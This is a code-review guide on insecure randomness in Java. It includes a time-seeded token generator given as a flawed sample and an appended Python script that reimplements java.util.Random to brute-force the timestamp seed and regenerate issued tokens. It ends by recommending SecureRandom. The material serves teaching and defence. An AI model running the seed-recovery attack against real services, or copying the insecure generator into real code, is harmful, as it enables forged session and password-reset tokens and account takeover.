Code review
What to look for
When reviewing code, look first for the functions that produce random output: session identifiers, password-reset and CSRF tokens, nonces, one-time codes. Once you have found them (all of them if possible), trace how the underlying generator is seeded, and check whether the generator itself is a cryptographic one or a plain deterministic PRNG such as java.util.Random, which is a 48-bit linear congruential generator that yields the same sequence every time it is given the same seed.
If the seed is derived from the current time in milliseconds, or from any other value that an attacker can predict or extract through a separate vulnerability, the insecure randomness finding is confirmed: anyone who can narrow the seed down to a manageable range can rebuild the generator offline and reproduce every token it issued.
Below is a sample of insecure token generation written in Java:
import java.util.Random;

public class InsecureTokenGenerator {
    public static void main(String[] args) {
        // Insecure: predictable seed
        long seed = System.currentTimeMillis();
        Random random = new Random(seed);
        StringBuilder token = new StringBuilder();
        for (int i = 0; i < 16; i++) {
            // Insecure random value
            int val = random.nextInt(36);
            if (val < 10) {
                token.append((char) ('0' + val));
            } else {
                token.append((char) ('a' + (val - 10)));
            }
        }
        System.out.println("Generated token: " + token.toString());
    }
}
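The attacker's side of this finding, as an added example that is not part of the original page: a Python port of java.util.Random (the 48-bit state, the multiplier 0x5DEECE66D, the increment 0xB and the nextInt rejection rule are the JDK's) that regenerates the token above from a candidate millisecond timestamp and brute-forces the seed over a window around the time the response was observed. The issuance timestamp, the attacker's 4.3 s estimate error and the 10 s window are constructed for the demo; the token layout (16 characters from 0-9a-z) is the page's.

```python
# Added example (not from the original page): recover the time-based seed of the
# InsecureTokenGenerator shown above by re-implementing java.util.Random.

MASK48 = (1 << 48) - 1
MULTIPLIER = 0x5DEECE66D  # JDK constant
INCREMENT = 0xB           # JDK constant


class JavaRandom:
    """Port of java.util.Random's 48-bit linear congruential generator.

    Same seed scrambling, state update and bit extraction as the JDK, so for a
    given seed it produces the same values as new Random(seed) in Java.
    """

    def __init__(self, seed):
        self.state = (seed ^ MULTIPLIER) & MASK48

    def next_bits(self, bits):
        self.state = (self.state * MULTIPLIER + INCREMENT) & MASK48
        return self.state >> (48 - bits)

    def next_int(self, bound):
        """Equivalent of Random.nextInt(bound) for bound > 0."""
        if bound <= 0:
            raise ValueError("bound must be positive")
        if bound & (bound - 1) == 0:  # power of two: scale the high 31 bits
            return (bound * self.next_bits(31)) >> 31
        while True:
            bits = self.next_bits(31)
            val = bits % bound
            # Java retries when bits - val + (bound - 1) would overflow a signed int
            if bits - val + (bound - 1) < (1 << 31):
                return val


def generate_token(seed_ms, length=16):
    """Reproduce the page's generator: `length` chars from [0-9a-z], seeded with a timestamp."""
    rng = JavaRandom(seed_ms)
    out = []
    for _ in range(length):
        v = rng.next_int(36)
        out.append(chr(ord("0") + v) if v < 10 else chr(ord("a") + v - 10))
    return "".join(out)


def recover_seed(token, approx_ms, window_ms=60_000):
    """Brute-force the millisecond timestamp that produced `token`.

    approx_ms is the attacker's estimate of when the token was issued (for
    example the HTTP Date header of the response that carried it); the search
    covers approx_ms +/- window_ms. Returns the seed, or None if not found.
    """
    for candidate in range(approx_ms - window_ms, approx_ms + window_ms + 1):
        if generate_token(candidate, len(token)) == token:
            return candidate
    return None


if __name__ == "__main__":
    # Constructed scenario: the server issued a token at this made-up timestamp.
    issued_at = 1_700_000_000_000
    observed = generate_token(issued_at)
    # The attacker's clock estimate is off by a few seconds; search +/- 10 s.
    guess = issued_at + 4_321
    found = recover_seed(observed, guess, window_ms=10_000)
    print("observed token :", observed)
    print("recovered seed :", found, "(correct)" if found == issued_at else "(miss)")
    print("regenerated    :", generate_token(found) if found is not None else "-")
```

A 16-character token from a 36-symbol alphabet looks like roughly 82 bits, but its real entropy is bounded by how precisely the attacker can guess the seed: a one-minute window is 120,001 candidates, each costing sixteen LCG steps. Seeding is the wrong thing to fix; the generator is. In Java the replacement is java.security.SecureRandom constructed without a caller-supplied seed, so the JVM draws its seed from the platform entropy source.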